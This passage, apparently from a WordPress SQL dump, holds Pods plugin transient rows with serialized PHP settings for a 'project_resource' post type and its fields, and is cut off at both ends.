`t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:67:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:16:\"project_resource\";s:2:\"id\";i:449;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:17:\"Project Resources\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:16:\"Project Resource\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:14:\"supports_title\";s:1:\"1\";s:15:\"supports_editor\";s:1:\"1\";s:4:\"type\";s:9:\"post_type\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:16:\"project_resource\";s:18:\"publicly_queryable\";s:1:\"1\";s:19:\"exclude_from_search\";s:1:\"0\";s:15:\"capability_type\";s:4:\"post\";s:22:\"capability_type_custom\";s:16:\"project_resource\";s:21:\"capability_type_extra\";s:1:\"1\";s:11:\"has_archive\";s:1:\"0\";s:12:\"hierarchical\";s:1:\"0\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:13:\"rewrite_feeds\";s:1:\"0\";s:13:\"rewrite_pages\";s:1:\"1\";s:9:\"query_var\";s:1:\"1\";s:10:\"can_export\";s:1:\"1\";s:14:\"default_status\";s:5:\"draft\";s:15:\"supports_author\";s:1:\"0\";s:18:\"supports_thumbnail\";s:1:\"1\";s:16:\"supports_excerpt\";s:1:\"1\";s:19:\"supports_trackbacks\";s:1:\"0\";s:22:\"supports_custom_fields\";s:1:\"0\";s:17:\"supports_comments\";s:1:\"0\";s:18:\"supports_revisions\";s:1:\"0\";s:24:\"supports_page_attributes\";s:1:\"0\";s:21:\"supports_post_formats\";s:1:\"0\";s:28:\"built_in_taxonomies_category\";s:1:\"0\";s:46:\"built_in_taxonomies_elementor_library_category\";s:1:\"0\";s:42:\"built_in_taxonomies_elementor_library_type\";s:1:\"0\";s:33:\"built_in_taxonomies_link_category\";s:1:\"0\";s:28:\"built_in_taxonomies_post_tag\";s:1:\"0\";s:37:\"built_in_taxonomies_resource_category\";s:1:\"0\";s:32:\"built_in_taxonomies_resource_tag\";s:1:\"1\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:17:\"show_in_admin_bar\";s:1:\"1\";s:11:\"pfat_enable\";s:1:\"1\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:18:\"pfat_append_single\";s:6:\"append\";s:18:\"pfat_filter_single\";s:11:\"the_content\";s:19:\"pfat_append_archive\";s:6:\"append\";s:19:\"pfat_filter_archive\";s:11:\"the_content\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:9:\"menu_icon\";s:19:\"dashicons-pressthis\";s:11:\"pfat_single\";s:25:\"Project Resource Template\";s:33:\"built_in_taxonomies_resource_type\";s:1:\"1\";s:41:\"built_in_taxonomies_institutions_category\";s:1:\"0\";s:26:\"supports_jetpack_publicize\";s:1:\"0\";s:25:\"supports_jetpack_markdown\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:27:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}s:12:\"resource_tag\";a:10:{s:4:\"name\";s:12:\"resource_tag\";s:5:\"label\";s:13:\"Resource Tags\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:12:\"resource_tag\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:12:\"resource_tag\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}}s:13:\"resource_type\";a:10:{s:4:\"name\";s:13:\"resource_type\";s:5:\"label\";s:14:\"Resource Types\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:13:\"resource_type\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:13:\"resource_type\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}}}}','off'),(5634481,'_transient_timeout_pods_8ec237833158d8d9f0e025ada2835d6e','1782377875','off'),(5634482,'_transient_pods_8ec237833158d8d9f0e025ada2835d6e','a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\